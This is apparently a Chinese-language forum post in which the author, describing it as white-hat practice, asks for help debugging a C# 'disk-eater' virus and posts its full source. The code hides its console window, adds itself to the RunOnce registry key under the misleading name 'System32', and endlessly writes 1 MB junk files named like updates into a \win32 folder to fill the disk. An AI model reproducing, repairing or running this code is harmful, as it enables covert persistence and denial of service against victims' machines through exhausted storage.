我最近一直在尝试制作一个吃盘病毒,以进一步提高我的教育知识,并提高我为白帽黑客编写恶意代码的技能。但是最近我一直在处理的代码给我带来了很多问题。
当您启动 exe 时它运行完美,但是当它从注册表运行时,它会给出错误。拒绝访问路径 (C:\Windows\System32\parse.int)
我对为什么在 system32 位置运行代码感到困惑!?
__________________ 代码 ________________________
using System;
using System.Runtime.InteropServices; // needed to hide console
using System.IO;
using Microsoft.Win32; // Registry
namespace diskeater
{
class Program
{
// stuff to let me hide it
[DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
const int SW_HIDE = 0;
static void Main(string[] args)
{
// Hide
//var handle = GetConsoleWindow();
// ShowWindow(handle, SW_HIDE);
//Hidden
const string userRoot = "HKEY_CURRENT_USER";
const string subkey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce";
const string keyName = userRoot + "\\" + subkey;
Registry.SetValue(keyName, "System32", "\"" + System.Windows.Forms.Application.ExecutablePath + "\"");
if (File.Exists("parse.int") == false) {
var temp = File.Create("parse.int");
temp.Close();
var temp2 = new StreamWriter("parse.int");
temp2.Write("0");
temp2.Close();
}
try {
string text, count;
int i;
try {
var intreader = new StreamReader("parse.int");
count = intreader.ReadToEnd();
intreader.Close();
text = new string('0', 1048576);
i = Convert.ToInt32(count);
while (true) {
try {
var sw = new StreamWriter("\\win32\\UpdateFile_" + i + ".dat");
sw.Write(text);
sw.Close();
var intcount = new StreamWriter("parse.int");
intcount.Write(i);
intcount.Close();
i++;
System.Threading.Thread.Sleep(250);
}
catch (DirectoryNotFoundException ex) {
Directory.CreateDirectory("\\win32");
Console.WriteLine(ex);//
}
}
} catch (FormatException ex) {
var intcount = new StreamWriter("parse.int");
intcount.Write("0");
intcount.Close();
Console.WriteLine(ex);//
}
} catch (FileNotFoundException ex) {
Console.WriteLine(ex);//
}
System.Threading.Thread.Sleep(1000000000); //
}
}
}